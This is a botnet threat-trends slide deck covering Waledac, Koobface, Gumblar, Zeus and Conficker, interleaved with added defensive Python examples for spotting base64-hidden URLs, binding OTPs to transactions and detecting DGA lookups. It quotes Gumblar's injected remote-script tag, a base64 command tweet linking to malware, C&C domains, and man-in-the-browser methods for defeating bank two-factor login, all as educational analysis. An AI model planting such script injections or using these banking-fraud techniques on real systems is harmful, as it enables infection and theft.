Cyber Attack Trend and Botnet


S.C. Leung CISSP CISA CBCP

Agenda
• Botnet and Cyber Attack Trends
• Botnet Attack Trends
  1. Commercialization of Cyber Crime
  2. Professionalization of Cyber Crimeware
  3. Social Engineering always cool – Waledac botnet
  4. Following the Social Network Services – Koobface botnet
  5. Delivering via Web attack & Search Engine – Gumblar botnet
  6. Following the Money – Banking Trojans like Zeus botnet
  7. Building the Survival Kit – Conficker botnet
• Defending against Botnet

Botnet (roBot Network) = infrastructure of controlled victim computers (bots)
[Diagram: Bot Herder → C&C servers → bots. Down: command/update; Up: data. The bots are turned against victims for spam, DDoS attack, malware and phishing]

1. Commercialization of Cyber Crime – Product and Service Delivery for Profit
• What do attackers want now?
• What are their products and services?
  – Products
    • Personal credentials, CCN, SSN, software CD keys
    • Tools to exploit, tools to hide malware
  – Service subscription:
    • spam, phishing, DDoS
    • botnet (76services.com, now closed)

2. Professionalization of Cyber Crimeware
• Division of Labour, R&D and Outsourcing
• Botnet is a sign of maturity of the infrastructure for the underground economy
• Malware development, Botnet optimization
  – Malware good at detection evasion
  – Malware targeting, identifying and terminating security software
  – Service delivery
  – Multi-language support
  – Maintenance
  – Remote administration support
  – Long term control
  – Signing and encryption
• IT Infrastructure
  – Hosting – network, web hosting in a hacker-friendly environment
    • where there is great bandwidth
    • where legislation is lax
    • where user awareness is low
  – Domain – registration, domain hosting
    • where the take-down procedure is lengthy

3. Social Engineering always cool – Waledac Botnet
Waledac Botnet
• Spreading by
  – Spam emails employ social engineering extensively
    • contain link to iFrame-embedded malicious website, tricking the user into installing the malware
• Author = Creator of Storm botnet (which overwhelmed the Internet back in 2007)
• Has sound infrastructure
  – uses Nginx web server
  – uses Double Fast Flux DNS
    • The DNS records are changing all the time
    • The DNS servers are changing all the time

Waledac – Fast-flux
• Bot hosts can be dynamically assigned in real time

Waledac theme – eCard
• social engineering – follow the talks of the town
• lure file: postcard.exe

Waledac Themes
• social engineering – follow the talks of the town: “Terrorist Attack”, “SMS Spy on your Partner”, “Independence Day” theme
[Figure: screenshots of the themed lure pages]

Waledac Service and Feature
• Impact
  – open a back door on the compromised computer
  – steal personal information
  – spam contacts in address book
  – turn zombie into web server, web proxy, DNS and spam template relays
• Major web server service
  – Pharmacy
  – serving malware

4. Following the Social Network Services – Koobface (koob-face)
• A worm spreading in Facebook, MySpace, Twitter, Friendster, hi5 & Bebo
• Spreading
  – Spoof a friend and send a message “Hello; You must see it!!! LOL” with a URL
  – URL brings the user to a fake YouTube site, luring them to install a file “Flash_update.exe”
  – Upon execution, the victim is infected.
• Impact
  – Poison all user searches (Google, Ask, Yahoo and Bing) to a malicious site
• Source: http://www.f-secure.com/weblog/archives/00001517.html

Koobface: Twitter campaign
• PCs infected with Koobface sent out Tweets with a malicious URL

A Botnet uses Twitter as Command Channel
• Bots subscribe to an RSS feed to get commands
• A Tweet like this
  – “aHR0cDovL2JpdC5seS9SNlNUViAgaHR0cDovL2JpdC5seS8yS29Ibw==”
• Base64-decoding the tweet, we get 2 tiny URLs
  – http://bit.ly/R6STV
  – http://bit.ly/2KoHo
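The Twitter-as-command-channel slide above shows a tweet that is nothing but a base64 blob hiding two shortener links. The following scanner is an added example, not code from the talk: it pulls base64-looking runs out of social-media posts, decodes them, and reports any URL that only appears after decoding, which is the signal a defender can alert on. The sample posts are constructed for the example (the first is the tweet quoted on the slide); it also tolerates whitespace inside the blob, as in the split copy that appears in the slide text.

```python
import base64
import binascii
import re

# Constructed sample: the tweet quoted on the slide, plus two benign posts so
# the scanner has both positive and negative input.
SAMPLE_POSTS = [
    "aHR0cDovL2JpdC5seS9SNlNUViAgaHR0cDovL2JpdC5seS8yS29Ibw==",
    "Great talk on botnets today, slides at http://example.org/slides",
    "lol see this!!! QUJDREVG",  # decodes to "ABCDEF": no URL, not flagged
]

# Runs of base64 alphabet characters long enough to carry a URL. Whitespace is
# allowed inside a run and stripped before decoding (the slide's copy of the
# tweet was split by a space during extraction).
_B64_RUN = re.compile(r"[A-Za-z0-9+/=\s]{20,}")
_URL = re.compile(r"https?://[^\s\"'<>]+")


def decode_candidates(text):
    """Yield the decoded bytes of every base64-looking run in text."""
    for match in _B64_RUN.finditer(text):
        blob = re.sub(r"\s+", "", match.group(0))
        if len(blob) < 16:
            continue
        blob += "=" * (-len(blob) % 4)  # repair missing padding
        try:
            yield base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue


def extract_hidden_urls(post):
    """Return URLs that appear only after base64-decoding parts of the post."""
    found = []
    for raw in decode_candidates(post):
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue  # binary junk, not a command string
        found.extend(_URL.findall(decoded))
    return found


def flag_posts(posts):
    """Map each post carrying base64-hidden URLs to the URLs it hides."""
    flagged = {}
    for post in posts:
        urls = extract_hidden_urls(post)
        if urls:
            flagged[post] = urls
    return flagged


if __name__ == "__main__":
    for post, urls in flag_posts(SAMPLE_POSTS).items():
        print("hidden URLs in post:", urls)
```

Feeding an RSS feed or timeline through `flag_posts` gives a short list of accounts worth blocking at the proxy; in the page's case the decoded bit.ly links were the next hop to the encoded malware files.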
• The bit.ly tiny URLs translated to:
  – http://pastebin.com/pastebin.php?dl=m5222dc70
  – http://paste.debian.net/43529/download/43529
  – The URLs point to encoded files. When decoded and unzipped, they give malware files which were found to be poorly detected as malware by VirusTotal

5. Delivering via Web attack & Search Engine – Gumblar Botnet

Gumblar Botnet: Impact
• Web site is a delivery channel of malware
  – Gumblar steals FTP credentials and uploads malware to 3000 legitimate web sites
  – Bots connect to two domains for download: “gumblar.cn” / “martuz.cn”
• Two botnets formed: one for web sites and one for infected client PCs
• Impacts
  – Client PCs: install a backdoor in victims’ computers that connects to C&C
    • steal FTP credentials from the victims’ computers
    • Man in the browser attack: monitor traffic to and from the browser:
      – Replace Google search results with links pointing to malicious websites
      – Redirect from e-commerce or banking site to phishing web sites
  – Web sites: compromise any websites owned or operated by the victims
    • distribute malware which exploits Acrobat Reader & Flash Player vulnerabilities

Gumblar Botnet: Obfuscation
• Web pages are injected with obfuscated scripts, which vary from site to site, or page to page
• Injected tag as shown in Malzilla: <script src=//martus.cn/vid/?id=j></script>

Gumblar Botnet: Detection and Take down
• Blocking
  – block the two C&C sites: “gumblar.cn” and “martuz.cn”
• Checking (not 100% accurate)
  – http://www.unmaskparasites.com/security-report/

6. Following the Money – Botnet targeting Banks
What I have seen on a Zeus Botnet C&C Management interface
• Bot administration features:
  – Screenshot (save to html without image)
  – Fake redirect (redirect to a prepared fake bank webpage)
  – Html inject (hijack the login session and inject new field)
  – Log the visiting information of each banking site, record the input string (text or post URL)
  – An unknown field (table: yes/no) found with syntax nn:nnnnnnnn – if the value is yes, mostly with comment, the comment logged the a/c information, e.g. transfer limit.

Fake Redirect login page
[Figure: screenshot of a fake redirect login page. Source: Computer Associate]

Man-in-the-Browser – Hacker’s ideal operation
• Intercept transaction
• Change amount and change destination to attacker account and send to the bank
• Change the display to user as if his transaction was executed
  – Calculate the “should be amount” and rewrite the remaining total to screen
• Source: www.cronto.com

Man in the Browser (MITB)
• Install software/plugin inside the browser
• Hooking key OS and web browser APIs and proxying data
[Diagram: Web App – MITB – Winsock: the MITB component sits between the web application and the socket layer]
• Advantage
  – No encryption barrier as in proxy
  – SSL Padlock is unaffected for modified content
  – Direct access to Data
    • Freely alter the web page displayed to the customer
    • Freely modify the requests sent back to the bank.
  – Direct interface to web browser & application
    • Can create additional commands (GET/POST/PUT)
  – Extremely stealthy
    • Client hard to detect, since network is not interfered with; web address, digital certificates are all correct
    • Bank sees the customer’s real IP address
  – Faster real time response so can break 2FA

Limbo 2 – HTML Injection
• Limbo 2 Trojan kit
• Some variants inject fake fields into the online banking forms that the browser displays to the user. The additional fields are designed to collect details to help an attacker to impersonate the victim and/or compromise the victim's account
• What is the use of getting the additional info?
• Source: ThreatExpert
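The MITB slides above make the point that a login-time one-time password does not help once the browser itself rewrites amount and destination: the code is valid for whatever transaction reaches the bank. The following is an added defensive example, not code from the talk or from any bank or vendor named on the page; it shows the countermeasure the Cronto material referenced on the slide is built around, a code bound to the transaction contents (HMAC over payee, amount and a bank-issued challenge, truncated HOTP-style to digits). The secret, account identifiers and amounts are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed demo secret shared between the customer's token and the bank.
# A real deployment provisions a per-customer key in a hardware token or app.
TOKEN_SECRET = b"demo-only-token-secret"


def transaction_code(secret, payee, amount_cents, nonce, digits=8):
    """Derive a short numeric code bound to exactly this payee, amount and nonce.

    The customer's token computes it from the details the customer keys in
    (or reads from the bank's challenge), so the code only authorises the
    transaction the customer actually saw on the token, not on the screen.
    """
    msg = f"{payee}|{amount_cents}|{nonce}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).digest()
    # Dynamic truncation as in HOTP (RFC 4226): 31 bits at an offset chosen by
    # the last nibble, reduced modulo 10^digits.
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{code % (10 ** digits):0{digits}d}"


def bank_verify(secret, submitted_payee, submitted_amount_cents, nonce, code):
    """Bank side: recompute over the transaction the bank received, not what
    the customer saw. A browser that altered payee or amount in transit can
    only replay the customer's code, which no longer matches."""
    expected = transaction_code(secret, submitted_payee,
                                submitted_amount_cents, nonce)
    return hmac.compare_digest(expected, code)


def demo_mitb_tamper():
    """Replay the scenario on the slide: the customer authorises 100.00 to a
    registered payee; the MITB rewrites the request to a mule account."""
    nonce = secrets.token_hex(8)  # fresh challenge issued by the bank
    payee, amount = "ACCT-REGISTERED-001", 10000
    code = transaction_code(TOKEN_SECRET, payee, amount, nonce)

    honest = bank_verify(TOKEN_SECRET, payee, amount, nonce, code)
    # The MITB substitutes destination and amount but cannot compute a new code.
    tampered = bank_verify(TOKEN_SECRET, "ACCT-MULE-999", 250000, nonce, code)
    return honest, tampered  # (True, False)


if __name__ == "__main__":
    print("honest accepted, tampered accepted:", demo_mitb_tamper())
```

The same property defeats the shadow-login trick later in the deck: an OTP phished with a fake “please retry” window is only a second login code, whereas a transaction code is useless without the payee and amount the customer keyed into the token.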
Inserting transaction (when login)
[Diagram: Login vs. Shadow Login – the Trojan kicks up a shadow login at the back. The user submits PIN + OTP; the Trojan inserts a new window (“Not successful. Please retry”) asking for PIN + OTP2; the hacker uses OTP2 to authenticate a transaction]

HKMA Circular 2009-07-13
• The HKMA noticed that the recent fraudulent technique adopted by fraudsters is believed to involve infecting the customer's personal computer (PC) with Trojan horse programs to hijack the Internet banking login credentials of customers (including one-time passwords for two-factor authentication) during the Internet banking login process. The hijacked login credentials were used by the fraudsters to conduct high-risk Internet banking transactions such as making fund transfers to an unregistered third-party account.

7. Building the Survival Kit – Conficker Botnet

Conficker – Propagation Mechanism
[Figure: propagation mechanism diagram. Source: Cisco 2009 MidYear Report]

Conficker – a model for sustainable botnet
• Designed to survive in disaster – what if the C&C are taken down?
  – Conficker.B – Domain generation for malware update
    • Active since Nov 2008, generating 250 domains/day in 5 TLDs for update
  – Conficker’s natural predator: the Conficker Working Group
    • Alliance of ICANN, domain registries and IT industry worked together to pre-empt Conficker
      – Pre-register domains
      – Redirect traffic to sinkholes to study the behaviour
  – Conficker.C improved
    • Starting Apr 1, 2009, generating 50,000 domains/day in 116 TLDs; uses 500 at random (some are existing domains), making it harder to pre-empt the domains
    • improved authentication and encryption so you cannot infiltrate the Conficker.C botnet easily
    • uses P2P for update as well – peers can update each other with the right authentication
    • Blocks more security vendors’ web sites

Collaborative Effort Works!
• Conficker Working Group led a concerted effort (www.confickerworkinggroup.org)
  – ICANN organized all registries to pre-empt the registration and handle affected domains
  – Researchers generated the list of generated domains and affected domains to provide transparency
  – Some worked out an EyeChart for easy detection
  – Security vendors developed detection and removal tools
• HKIRC, HKCERT, Police and OGCIO – Check affected domains in April
[Figure: Conficker.C domain check result – “No infection”]
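Pre-registering and sinkholing the generated domains is the registry-side defence described above; on a network you do not need the algorithm at all to spot a bot walking its daily list, because most of the 500 names it tries do not exist. The following is an added example, not from the talk or the Conficker Working Group: it reads a constructed DNS log in the shape “timestamp client qname rcode” and flags clients that receive many NXDOMAIN answers spread over many TLDs inside a short window. The log lines, hosts, domain names and thresholds are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. 10.0.0.7 behaves like a bot trying generated names
# across many TLDs; 10.0.0.5 is an ordinary user with one typo.
SAMPLE_LOG = """\
2009-04-01T09:00:01 10.0.0.5 www.example.com NOERROR
2009-04-01T09:00:02 10.0.0.5 mail.example.com NOERROR
2009-04-01T09:00:03 10.0.0.5 wwww.example.com NXDOMAIN
2009-04-01T09:00:04 10.0.0.7 qzkfvwpm.info NXDOMAIN
2009-04-01T09:00:04 10.0.0.7 hjgrxlbq.ws NXDOMAIN
2009-04-01T09:00:05 10.0.0.7 tnwpcoeay.cc NXDOMAIN
2009-04-01T09:00:05 10.0.0.7 lmdkqtvh.biz NXDOMAIN
2009-04-01T09:00:06 10.0.0.7 rcxfuoweb.org NXDOMAIN
2009-04-01T09:00:06 10.0.0.7 vbnmqlsu.cn NXDOMAIN
2009-04-01T09:00:07 10.0.0.7 xgwvidjfp.net NXDOMAIN
2009-04-01T09:00:07 10.0.0.7 update.example.com NOERROR
"""


def parse_log(text):
    """Yield (timestamp, client, qname, rcode) per non-empty log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, rcode = line.split()
        yield datetime.fromisoformat(ts), client, qname.lower().rstrip("."), rcode


def tld_of(qname):
    return qname.rsplit(".", 1)[-1]


def find_dga_suspects(text, window=timedelta(minutes=10),
                      min_nxdomain=5, min_tlds=3):
    """Return {client: (distinct NXDOMAIN names, distinct TLDs)} for clients
    that resolve many non-existent names across many TLDs within one window.

    A domain-generation bot queries hundreds of names per day of which only a
    handful are registered, so its NXDOMAIN count and TLD spread sit far above
    a user's occasional typo. The first window that crosses both thresholds is
    reported.
    """
    per_client = defaultdict(list)
    for ts, client, qname, rcode in parse_log(text):
        if rcode == "NXDOMAIN":
            per_client[client].append((ts, qname))

    suspects = {}
    for client, events in per_client.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            names = {q for t, q in events[i:] if t - start <= window}
            tlds = {tld_of(q) for q in names}
            if len(names) >= min_nxdomain and len(tlds) >= min_tlds:
                suspects[client] = (len(names), len(tlds))
                break
    return suspects


if __name__ == "__main__":
    for client, (names, tlds) in find_dga_suspects(SAMPLE_LOG).items():
        print(f"{client}: {names} NXDOMAIN names over {tlds} TLDs")
```

The TLD-spread condition is what separates this from a mistyped hostname or a misconfigured search list, and it matches the Conficker.C figures on the slide (116 TLDs) rather than any one family's algorithm, so the same check keeps working after the generator changes.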